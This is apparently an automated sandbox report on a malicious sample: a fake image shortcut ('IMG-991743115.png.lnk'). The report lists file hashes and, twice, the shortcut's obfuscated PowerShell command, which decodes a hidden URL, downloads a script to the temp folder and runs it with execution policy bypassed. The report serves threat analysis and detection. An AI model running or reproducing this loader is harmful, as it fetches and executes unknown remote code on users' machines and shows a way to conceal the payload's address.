Malicious
Malicious
Infection Chain
Summary by MalvaGPT
Characteristics
Hash
 Hash Value
MD5
4a6053835b1d6c5f2aa4091f65f20699
Sha1
971874e179c2814a999b76275813e7656486fe34
Sha256
0ac143da7accb2fa62363146eebc676628d4095614f9d416fdb81ef456348d1c
Sha384
9eed0918948ddf4f31803dbe0bf773fc32f29c58fd9c035fa443509b7254cbb826f51a246f3688500aeb7a658593cbe3
Sha512
7339fd5245404a05583736b7bbc0a0c401a9108f15cfab8ebc54317af4bcbd86c673eb262a3594d038845e593026e2ad60107878275c991552e6fcceced0089e
SSDeep
96:4/UqHbuaJVAk2hq/qn7mRw3hVIQWMw0AkmEY+FP4QHTlYL/I2iDmO54EnxCQWrQp:4/ZSaJV/qLxbJmkP4QxYISXEQQ0Qp
TLSH
CEE18E53E76FA526D9423D3851DCE85E4467D226ACE3C47FC52727562821187002AF79
File Structure
4a6053835b1d6c5f2aa4091f65f20699
Malicious
MP-488835696.mp4
IMG-991743115.png.lnk
Malicious
LNK CommandLine
Malicious
Artefacts
Name
 Value
LNK: Command Execution

powershell.exe -ep bypass -c "$h=[bigint]\"177845265022739605218494539407119502495236530353767\";$a=[bigint]\"15033803975835653254346047739547794361893456465137\";$n=$h - $a;while($n -ne 0){$b+=[char]([int]($n -band 0xFF));$n=$n -shr 8};iwr $b -OutFile $env:TEMP\kXs6PztH.ps1 -UseBasicParsing; powershell -ep bypass -File $env:TEMP\kXs6PztH.ps1"
4a6053835b1d6c5f2aa4091f65f20699 (6.83 KB)
File Structure
4a6053835b1d6c5f2aa4091f65f20699
Malicious
MP-488835696.mp4
IMG-991743115.png.lnk
Malicious
LNK CommandLine
Malicious
Characteristics
No malware configuration were found at this point.
Artefacts
Name
 Value Location
LNK: Command Execution

powershell.exe -ep bypass -c "$h=[bigint]\"177845265022739605218494539407119502495236530353767\";$a=[bigint]\"15033803975835653254346047739547794361893456465137\";$n=$h - $a;while($n -ne 0){$b+=[char]([int]($n -band 0xFF));$n=$n -shr 8};iwr $b -OutFile $env:TEMP\kXs6PztH.ps1 -UseBasicParsing; powershell -ep bypass -File $env:TEMP\kXs6PztH.ps1"

Malicious

4a6053835b1d6c5f2aa4091f65f20699 > IMG-991743115.png.lnk
You must be signed in to post a comment.
An error has occurred. This application may no longer respond until reloaded. Reload 🗙